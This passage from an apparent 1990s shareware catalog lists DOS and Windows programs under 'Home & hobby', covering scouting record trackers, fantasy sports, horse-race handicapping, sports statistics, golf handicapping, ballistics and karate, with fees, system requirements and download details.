poet! See full description on + page 200. + + Product: SNAKE + Author: Chatfield Software, Inc. (Hale Chatfield), 216-632-5447 + Version: 1.0 (10-01-94) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $6.00 + Registration benefits: lifetime unlimited tollfree 800# phone, + fax, CompuServe, GEnie, newsletter, mail support; 1-month + return policy; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades. + Shareware copy of next disk in series; 10% discount of other + Chatfield Software products. + Look for: availability unknown on BBSs. + Download size: 772k (about 58 minutes with a 2400 baud modem) + Description: + "Art-for-art's-sake" poetry. + + + 15.22 Scouting + + See also: Home & hobby, Sports, Firearms; Home & hobby, Hunting + & fishing. + + Chapter 15, "Home & hobby" 559 + + + + Product: ARROW TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 2.0 (05-31-94) + Needs: IBM PC, DOS 3.3 or better. 490k RAM; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: ARTR20.ZIP on BBSs; ARTR20.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 305k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A menu driven program designed for OA Chapter use which stores + member info, dues status, committee assignments, honors, and + participation. Produces labels and multiple rosters, individual + records for each member as well as events and attendance + summary. Lodge Registration gets copies for all chapters plus + consolidation program. + + + Product: MERIT BADGE TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 4.0 (06-02-95) + Needs: IBM PC, DOS 3.0 or better. 310k RAM; Hard disk. + Strongly recommended: CGA monitor; HP DeskJet printer; HP + LaserJet printer; Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + all ASP-wide offers (see page 6); discounts on upgrades. 1 + free update disk(s) sent out. + Look for: MBTR40.ZIP on BBSs; MBTR40.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 850k (about 63 minutes with a 2400 baud modem) + Description: + A menu-driven program which store information on Merit Badge + counselors and presents that informaio in various reports. Will + generate rosters, Annual verification letters, and Labels. + + Chapter 15, "Home & hobby" 560 + + + + Product: PACK TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 4.0 (10-01-94) + Needs: IBM PC, DOS 3.0 or better. 320k RAM; Hard disk. + Strongly recommended: CGA monitor; HP DeskJet printer; HP + LaserJet printer; Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + all ASP-wide offers (see page 6); discounts on upgrades. 1 + free update disk(s) sent out. + Look for: PKTR40.ZIP on BBSs; PKTR40.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + A menu-driven program which stores information on Pack Scous + and Scouters and produces Rosters, Labels, Individual Records, + Attendance summaries, Listing of Awards Earned, An Advancement + Report, and various demographic reports. + + + Product: POST TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 1.0 (01-27-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM. + Strongly recommended: Dual 720k floppy drives; Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, fax, CompuServe, mail + support; 3-month limited return policy; all ASP-wide offers + (see page 6). 1 free update disk(s) sent out. + Look for: POTR10.ZIP on BBSs; POTR10.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 309k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A menu-driven program which stores Post roster, attendance, + participation, Post offices, and training data. For boys who + are continuing to work on Eagle Scout, it also stores complete + Scout history; i.e., Merit Badges earned, advancement received, + troop offices, etc. Produces adult and explorer rosters, a + roster of former members, mailing labels, an individual record, + a post telephone call sheet and participation points summary. + + Chapter 15, "Home & hobby" 561 + + + + Product: SHIP TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 1.2 (03-15-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Strongly recommended: Dual 720k floppy drives; Hard disk. + Registration fee: $35.00 (add $2.00 for shipping to U.S. + addresses) + Registration benefits: lifetime unlimited tollfree 800# phone, + CompuServe, mail support; 3-month limited return policy. 1 + free update disk(s) sent out. + Look for: SHTR12.ZIP on BBSs; SHTR12.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 10014,2347 for + assistance). + Download size: 228k (about 17 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Stores ship's roster, advancment data, participation data, + ship's offices served, meetings attended, and all training + data. Generates scout and scouter rosters, roster of former + ship's members, 3 types of mailing labels, an individual + records for each member, and an attendance summary for all + scouts. + + + Product: TRAINING TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 3.0 (02-02-95) + Needs: IBM PC, DOS 3.0 or better. 540k RAM; Hard disk. + Strongly recommended: CGA monitor; HP DeskJet printer; HP + LaserJet printer; Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + discounts on upgrades. 3-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs; TNTR30.ZIP on CompuServe + in CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 + for assistance). + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + A menu-driven database management system designed to serve the + needs of BSA Districts/Councils that want to keep track of the + training records of their volunteers. Generates all BSA + recommended reports for all levels of program. + + Chapter 15, "Home & hobby" 562 + + + + Product: TROOP TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 5.0 (09-10-95) + Needs: IBM PC, DOS 3.0 or better. 530k RAM. + Strongly recommended: CGA monitor; HP LaserJet printer; Epson + printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 1 free update + disk(s) sent out. + Look for: TRTR50.ZIP on BBSs; TRTR50.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + TROOP TRACKER is a menu-driven program with a context-sensitive + help system and mouse support. Requires 530K RAM and a Hard + Disk. Will generate Rosters, Lables, Individual Records, + Advancement Evaluations, Eligibility for OA Evaluations, + Attendance and Service Project PArticipation Reports; + Advancement Reports, National Camping Award Applications, + Demographic and in-troop housekeeping Reports + + + Product: TROOP TRACKER 4 GIRLS + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 2.0 (12-20-94) + Needs: IBM PC, DOS 3.0 or better. 320k RAM; Hard disk. + Strongly recommended: CGA monitor; HP DeskJet printer; HP + LaserJet printer; Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + CompuServe, mail support; 3-month limited return policy; all + ASP-wide offers (see page 6); discounts on upgrades. 1 free + update disk(s) sent out. + Look for: TR4G20.ZIP on BBSs; TT4G20.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 750k (about 56 minutes with a 2400 baud modem) + Description: + A DOS-based menu-driven program which stores information on the + Girls and Leaders of a unit. Generates Rosters, Labels, + Individual Records, Honors Reports, Attendance and + Participation Summaries + + Chapter 15, "Home & hobby" 563 + + + + 15.23 Self development + + Product: ASTRO + Astrology program. See full description on page 525. + + Product: ASTRO For Windows + Astrology program. See full description on page 525. + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 200. + + Product: FasType for MS-DOS + Learn to type; be more productive! See full description on + page 457. + + Product: FasType for Windows + Learn how to type and be more productive! See full description + on page 457. + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 527. + + Product: NUMERO UNO + Numerology program. See full description on page 529. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 438. + + Product: POETRY STAR + An AI poetry tutor that chats & cracks jokes. See full + description on page 440. + + + 15.24 Sports + + See also: Home & hobby, Hunting & fishing. + + 15.24.1 Betting pools + + See also: Home & hobby, Gambling. + st + Product: 1 &goal Fantasy Football + Runs a fantasy football league. See full description on + page 571. + + Product: FastBreak Fantasy Basketball + Complete fantasy basketball program. See full description on + page 569. + + Chapter 15, "Home & hobby" 564 + + + + Product: Keyboard Coach Fantasy Football + Head-to-head fantasy football. See full description on + page 571. + + Product: LineDrive Fantasy Baseball + Complete fantasy baseball package. See full description on + page 567. + + Product: NFL Forecaster for DOS + Predicts winners & spreads of NFL games. See full description + on page 572. + + Product: NFL Forecaster for Windows + Predicts winners & spreads of NFL games. See full description + on page 573. + + 15.24.2 Handicapping + + See also: Home & hobby, Gambling. + + 15.24.2.1 For `the ponies' + + Product: Thoroughbred Handicapper Pro + Author: Whirlwind Technologies (James S Nixon) + Version: 2.1 (06-15-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; CGA monitor; + Hard disk. + Strongly recommended: Mouse. + Registration fee: $30.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; discounts on upgrades. + Look for: availability unknown on BBSs; THPRO.ZIP on CompuServe + in CIS:PCFUN forum LIBrary 9 (or contact userID 71742,3632 for + assistance). + SWREG#: 1668 + PsL#: 11045 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + A complete thoroughbred horserace handicapping system! + Powerful, yet easy to use, it incorporates a combination of + commonly used handicapping techniques to calculate the point + score and suggested wagering odds for each horse. Provides + reports for handicapping & wagers. Includes ability to track + all wagers; prints reports to screen & printer; choice of basic + or advanced handicapping; thorough on-screen help system; on- + disk user's manual; more. + + Chapter 15, "Home & hobby" 565 + + + + Product: TURF.v93 + Author: Second Career Software + Version: 1.01 (05-14-94) + Needs: IBM PC, DOS 2.0 or better. 300k RAM. ANSI.SYS or + equivalent. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime mail support; 1-month limited + return policy; bonus utilities. + Look for: TURF9311.ZIP on BBSs. + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A powerful and highly advanced, highly sophisticated, yet easy- + to-use, thoroughbred race handicapping system. It combines + sound, well-established race handicapping principles with + scientific statistical analysis methodology, applied to years' + worth of actual race data, to create a handicapping tool which + can be used at race tracks, from Belmont Park to the county + fair, at OTB or anywhere thoroughbreds are racing and a Daily + Racing Form or similar publication is available. + + + 15.24.2.2 For other + + Product: Golfhcap + Calculates handicaps using USGA Slope System. See full + description on page 574. + + Product: NFL Forecaster for DOS + Predicts winners & spreads of NFL games. See full description + on page 572. + + Product: NFL Forecaster for Windows + Predicts winners & spreads of NFL games. See full description + on page 573. + + 15.24.3 Baseball/softball + + Product: Diamond Data + Author: The Software Construction Co., 508-851-6204 + Version: 4.6 (07-30-94) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $25.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, + newsletter, mail support; 1-month return policy; bonus + + Chapter 15, "Home & hobby" 566 + + + + utilities; disks of other shareware; discounts on other + products. + Look for: DDATA_46.ZIP on BBSs (call 508-454-3864 to download it + at no charge); DDATA.ZIP on CompuServe in CIS:PCNEW forum + LIBrary 9 (or contact userID 70313,3615 for assistance); + DDATA_46.ZIP on GEnie in SPORTS forum LIBrary 1 (or contact + userID W.GEISER for assistance). + SWREG#: 2063 + PsL#: 10653 + Download size: 111k (about eight minutes with a 2400 baud modem) + Description: + Manipulate data for your league or team. 34 different + statistics are kept for each player. 9 more for each game + played. Databases can be merged to allow league totals, + lifetime stats, season totals, etc. depending on what info is + stored in each DB. Great for helping generate that batting + order or awards for your team/league banquet! A report + generation facility allows sorting and filtering (exclude + players below a threshold) by any statistic and can output to a + file, disk, or printer. + + + Product: League Manager + Author: Al Dodd Software Co., 813-683-4210 + Version: 1.90 (04-16-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $45.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, newsletter, mail support; bonus utilities; all + ASP-wide offers (see page 6). 12-month free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + A serious program that will handle just about any kind of + amateur sports league for youth. Multiple databases track each + division, team, player, adult, and sponsor. Handles custom + registration forms, rosters and mailing labels. Numerous + reports. Online help, user friendly, menu driven interface, + easy to use Support for over 150+ printers. Includes player + stats for baseball/softball. Team rosters approved by Little + League, Babe Ruth, and Dixie Youth (others in approval + process). + + Chapter 15, "Home & hobby" 567 + + + + Product: LineDrive Fantasy Baseball + Author: McS Custom Software, 707-725-6016 + Version: 6.13 (02-18-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor. + Strongly recommended: VGA monitor. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited mail support; bonus + utilities; bonus data; all ASP-wide offers (see page 6); disks + of other shareware; discounts on other products. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; LD613.ZIP on CompuServe + in CIS:LIBRARY forum LIBrary 0. + Download size: 334k (about 25 minutes with a 2400 baud modem) + Description: + Runs a fantasy baseball league for up to 15 teams. Standings + may be based on your choice of any or all of up to 12 + statistics. Compatable with USA Today Sports Center download + files (Automatic update utility included). + + + Product: MicroFox Baseball Statistics + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 1.02 (01-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. 640k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive; CGA monitor; Hercules monitor; Dual 720k + floppy drives; Hard disk; HP DeskJet printer; HP LaserJet + printer; Postscript printer; Mouse. + Registration fee: 35.00US$ (add 2.00US$ for shipping to U.S. + addresses) (add 3.00US$ for shipping to Canadian addresses) + (add 5.00US$ for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; bonus utilities; all ASP-wide + offers (see page 6); disks of other shareware; discounts on + other products. 1-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MBS102.ZIP on BBSs (call 216-661-9065 to download it at + no charge); MBS102.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 0 (or contact userID 73057,3113 for assistance); MBS102.ZIP on + GEnie in IBMPC forum LIBrary 0. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Keeps track of players, teams, leagues, and years. Has + statistics for batting, pitching, fielding, and games. + Schedules practices, games, fields, and umpires. Calculates + team standings and averages for batting, pitching, fielding, + stealing, power, etc. + + Chapter 15, "Home & hobby" 568 + + + + Product: StatTrak for Baseball + Author: ALL-PRO Software Inc., 608-271-1586 + Version: 5.3 (01-15-95) + Needs: IBM PC, DOS 3.2 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk. + Registration fee: $39.95 (add $3.75 for shipping to U.S. + addresses) (add $3.75 for shipping to Canadian addresses) (add + $3.75 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, CompuServe, + mail support; lifetime return policy; discounts on other + products; discounts on upgrades. + Look for: APSSB53.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Baseball/softball statistics management system for league, + tournament, or individual teams. Tracks batting, pitching, + fielding, game scores, team record, and team standings. Any + StatTrak report can be computed for any combination of games + (all games, league games, last 5 games, games 2-4-7, etc). Sort + on over 70 categories and even name your own additional + categories. Display and print reports or create report disk + files. Menu-driven and very easy to use. + + + 15.24.4 Basketball + + Product: Basketball Statistics + Author: Gentle Productions, 616-861-5157 + Version: 1.0 (11-05-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; CGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support. 6-month + return policy. + Look for: availability unknown on BBSs. + Download size: 273k (about 21 minutes with a 2400 baud modem) + Description: + Complete, easy to use basketball statistics program. Features + include a modern user interface with quick drop-down menus and + dialog boxes, four different report generation categories (team + single game, season games, season players, season single + player), custom report generation, custom performance rating + formulas, the ability to view reports on the screen, print + them, or save them to a file, and context-sensitive help. + + Chapter 15, "Home & hobby" 569 + + + + Product: FastBreak Fantasy Basketball + Author: McS Custom Software, 707-725-6016 + Version: 3.08 (02-18-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor. + Strongly recommended: VGA monitor. + Registration fee: $35.00 + Registration benefits: lifetime unlimited mail support; bonus + utilities; bonus data; all ASP-wide offers (see page 6); disks + of other shareware; discounts on other products. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; FB308.ZIP on CompuServe + in CIS:LIBRARY forum LIBrary 0. + Download size: 268k (about 20 minutes with a 2400 baud modem) + Description: + Runs a Fantasy or Rotissiere basketball league for up to 15 + teams. Automatic update utility allows updating using download + files from the USA Today Sports Center. + + + Product: League Manager + Manages any youth sports organization. See full description on + page 566. + + 15.24.5 Boating sports + + Product: Marnav + Author: C & E Associates (Edward J. Panner) + Version: 4.5 (09-12-95) + Needs: IBM PC, DOS 2.0 or better. 70k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $35.00 + Registration benefits: printed manual; 51/4" master disk(s); 6 + months of unlimited CompuServe, mail support; 1-month limited + return policy; bonus data; all ASP-wide offers (see page 6). + Look for: MARNAV45.ZIP on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A program to convert GPS (Lat/Lon) coordinates to LORAN Delays + and vice versa. Also calculates heading and distance from point + A to point B with point coordinates specified in either GPS or + LORAN coordinates. It also performs time/speed/distance + calculations and provides optional hard copy of all operations + for trip planning. An editor allows the addition of LORAN data. + + + 15.24.6 Firearms + + See also: Home & hobby, Scouting; Home & hobby, Hunting & + fishing. + + Chapter 15, "Home & hobby" 570 + + + + Product: QBALL + Author: Benjamin W. Hartley + Version: 2.40 (06-01-94) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. Dot matrix printer. + Strongly recommended: EGA monitor; Hard disk; Epson printer. + Registration fee: $25.00 (add $7.50 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; discounts on other products; + discounts on upgrades. Lifetime free upgrading allowed. 1 + free update disk(s) sent out. + Look for: QBALL240.ZIP on BBSs (call 718-837-3236 to download it + at no charge); QBAL24.ZIP on CompuServe in CIS:OUTDOOR forum + LIBrary 14 (or contact userID 70033,2612 for assistance); + QBALL240.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID B.HARTLEY1 for assistance). + Download size: 366k (about 27 minutes with a 2400 baud modem) + Description: + Compute: trajectory data, remaining velocity and energy, wind + deflection, time of flight, ballistic coefficients, slant fire + & crosswind corrections, point blank range, gun free recoil, + muzzle velocity (2 methods). Display 15 trajectories at once. + Tables output as hardcopy/save to file. User configurable + display & defaults. Utilities: translate graphics, read range + tables, install; reformat documentation; modify bullet lookup + data. On-disk user's manual. + + + 15.24.7 Football + st + Product: 1 &goal Fantasy Football + Author: McS Custom Software, 707-725-6016 + Version: 3.07 (01-31-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; 1ST37.ZIP on CompuServe + in CIS:CIS forum LIBrary 0. + Download size: 226k (about 17 minutes with a 2400 baud modem) + Description: + Runs a fantasy football league for up to 15 teams based on your + choice of any or all of 12 statistics. Compatable with US Today + Sports Center download files. + + Chapter 15, "Home & hobby" 571 + + + + Product: Keyboard Coach Fantasy Football + Author: McS Custom Software, 707-725-6016 + Version: 1.03 (01-08-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; KCB103.ZIP on CompuServe + in CIS:CIS forum LIBrary 0. + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + Runs a fantasy football league for 4 to 12 teams. Competition + is head-to-head and league standings are based on games won/ + lost. Games played based on actual NFL players stats in 12 + categories. + + + Product: League Manager + Manages any youth sports organization. See full description on + page 566. + + Product: NFL Forecaster for DOS + Author: 100% Cotton Software, 717-289-4019 + Version: 4.1d (05-15-96) + Needs: IBM PC, DOS 3.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus data; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 2 discount coupons; rebate for + teachers. + Look for: ODNFL41.ZIP on BBSs; ODNFL.ZIP on CompuServe in CIS:ASP + CD-ROM forum LIBrary 0 (or contact userID 103051,603 for + assistance). + SWREG#: 11286 + PsL#: 11343 + Download size: 206k (about 16 minutes with a 2400 baud modem) + Description: + Using ONLY scores, Forecaster ranks each team & predicts + winners & spreads of NFL games. Step-by-step process of + entering scores, forecasting spreads, saving data, viewing + rankings & printing reports. Requires only 10 minutes per week. + Prints 5 reports & the schedule; 6 view windows; sorts 8 ways. + Handles playoff & non-scheduled games. Function for creating + new season's schedule. For the past 5 seasons it predicted + winners correctly 63% of the time & spreads 60% of the time. + Ready for 1996-97. + + Chapter 15, "Home & hobby" 572 + + + + Product: NFL Forecaster for Windows + Author: 100% Cotton Software, 717-289-4019 + Version: 4.1w (05-15-96) + Needs: IBM PC, Windows 3.0 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $20.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus data; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 2 discount coupons; discount for + teachers. + Look for: FCAST41W.ZIP on BBSs; FCAST.ZIP on CompuServe in + CIS:ASP CD-ROM forum LIBrary 0 (or contact userID 103051,603 + for assistance). + SWREG#: 11285 + PsL#: 11343 + Download size: 266k (about 20 minutes with a 2400 baud modem) + Description: + Using ONLY scores, Forecaster ranks each team & predicts + winners & spreads of NFL games. Step-by-step process of + entering scores, forecasting spreads, saving data, viewing + rankings & printing reports. Requires only 10 minutes per week. + Prints 5 reports & the schedule; 6 view windows; sorts 8 ways. + Handles playoff & non-scheduled games. Function for creating + new season's schedule. For the past 5 seasons it predicted + winners correctly 63% of the time and spreads 60% of the time. + Ready for 1996-97. + + Chapter 15, "Home & hobby" 573 + + + + 15.24.8 Golf + + Product: Golf Tournament Scorekeeper + Author: Home Alone Software, 403-425-4404 + Version: 1.2 (07-04-94) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, GEnie, + mail support; bonus utilities; all ASP-wide offers (see + page 6). + Look for: GOLFTS12.ZIP on BBSs; GOLFTS.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 9 (or contact userID 75240,243 for + assistance); GOLFTS12.ZIP on GEnie in SPORTS forum LIBrary 12 + (or contact userID B.LANE4 for assistance). + SWREG#: 1978 + Download size: 183k (about 14 minutes with a 2400 baud modem) + Description: + Calculates gross and net scores with a choice of handicapping + methods. Outputs a sorted leader board to screen or printer. + Allows up to 10 separate flights and team play including best + ball scoring. Provides a handicap for the unhandicapped using + the Callaway system. Has a Callaway hidden holes option and + many comprehensive reports. Reduces time spent caculating + standings from hours to minutes. + + + Product: Golfhcap + Author: C & E Associates (Edward J. Panner) + Version: 5.5 (09-12-95) + Needs: IBM PC, DOS 2.0 or better. 150k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $35.00 + Registration benefits: printed manual; 51/4" master disk(s); 6 + months of unlimited CompuServe, mail support; 1-month limited + return policy; all ASP-wide offers (see page 6). + Look for: GLFHCP55.ZIP on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Not only calculates golfer's handicaps using the USGA Slope + system but also prints membership lists, mailing labels, score + input forms, handicap index cards as well as a monthly report + showing scores used, old and new handicap indexes for each + golfer. Also provides a printout of the handicapping data for + any single golfer to help resolve any problems. Will handle up + to 12 groups of golfers with each group having up to 500 + golfers. + + Chapter 15, "Home & hobby" 574 + + + + 15.24.9 Martial arts + + Product: Discover Karate 1 - White Belt + Author: Midi Age Productions (Miles Eddy) + Version: 0.97 (05-17-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; EGA monitor; + Hard disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $9.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; 1-month return policy; discounts on + other products. + Look for: availability unknown on BBSs. + Download size: 1410k (about 105 minutes with a 2400 baud modem) + Description: + Learn beginning karate. Follow Daniel Schubert, Black Belt and + Certified Karate Instructor, as he demonstrates this sport. + Each belt has its own kicks, blocks, punches, sparring tips and + katas. Using color photo demonstrations and text, you learn + these karate techniques for the first of nine belt levels. + + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 527. + + 15.24.10 Soccer/rugby + + Product: League Manager + Manages any youth sports organization. See full description on + page 566. + + 15.24.11 Other + + Product: ALL-PRO League Scheduler + Author: ALL-PRO Software Inc., 608-271-1586 + Version: 1.1 (01-17-95) + Needs: IBM PC, DOS 3.2 or better. 640k RAM; CGA monitor; Hard + disk; Mouse. + Registration fee: $49.95 (add $3.75 for shipping to U.S. + addresses) (add $3.75 for shipping to Canadian addresses) (add + $3.75 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + lifetime return policy; discounts on upgrades. + Look for: APSLS11.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Schedules games for any number of leagues, 40 teams per league, + at any number of locations. Handles division play, tracks + scores, and creates standings. Lets you customize and edit the + + Chapter 15, "Home & hobby" 575 + + + + schedule. Displays and prints reports. Mouse support, menu- + driven and very easy to use! + + + Product: Book-It + Membership and activity booking system. See full description + on page 302. + + Product: KBBLH120.ZIP + Kabbalah: The Prophecy of the Chariot. See full description on + page 581. + + Product: Landscape Explorer + 3D landscape visualization tool. See full description on + page 501. + + + 15.25 Other + + Product: Computerized Christmas Cards + Author: Impact D. Publishing, 619-346-6609 + Version: 1.3 (10-01-95) + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, CompuServe, mail support; 1-month + return policy; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. Free copy of + Computerized Birthday Cards. + Look for: CXMASC13.ZIP on BBSs. + Download size: 351k (about 26 minutes with a 2400 baud modem) + Description: + You select from 3 different 